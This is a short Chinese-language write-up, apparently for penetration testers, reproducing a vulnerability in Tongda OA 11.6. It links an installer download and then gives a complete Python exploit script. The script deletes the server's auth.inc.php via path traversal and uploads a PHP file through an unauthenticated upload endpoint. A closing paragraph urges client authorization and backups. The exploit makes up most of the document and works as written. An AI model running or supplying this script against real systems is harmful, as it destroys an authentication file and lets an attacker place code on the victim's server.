安装
下载通达OA安装包进行安装。
下载链接:
链接: https://pan.baidu.com/s/1tSuxT3N2zdEPwGH07-pmRw 密码: t9s3
安装完成后会自动打开页面。
漏洞利用
# _*_ coding utf-8 _*_# author:return0;import requeststarget="http://10.211.55.5"payload="<?php echo HelloWorld ?>"print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")input("Press enter to continue")print("[*]Deleting auth.inc.php....")url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"requests.get(url=url)print("[*]Checking if file deleted...")url=target+"/inc/auth.inc.php"page=requests.get(url=url).textif 'No input file specified.' not in page: print("[-]Failed to deleted auth.inc.php") exit(-1)print("[+]Successfully deleted auth.inc.php!")print("[*]Uploading payload...")url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"files = {'FILE1': ('hack.php', payload)}requests.post(url=url,files=files)url=target+"/_hack.php"page=requests.get(url=url).textif 'No input file specified.' not in page: print("[+]Filed Uploaded Successfully") print("[+]URL:",url)else: print("[-]Failed to upload file")
然后运行此代码
使用浏览器打开链接即可复现成功,该漏洞在实际安服渗透验证复现时需通知客户做好备份。安服仔在验证时不需要删除auth.inc.php文件,自行编写脚本验证该文件存在且OA版本为11.6即可证明存在此漏洞。网络不是法外之地,渗透测试需在得到客户充分授权并告知客户风险的情况下开展。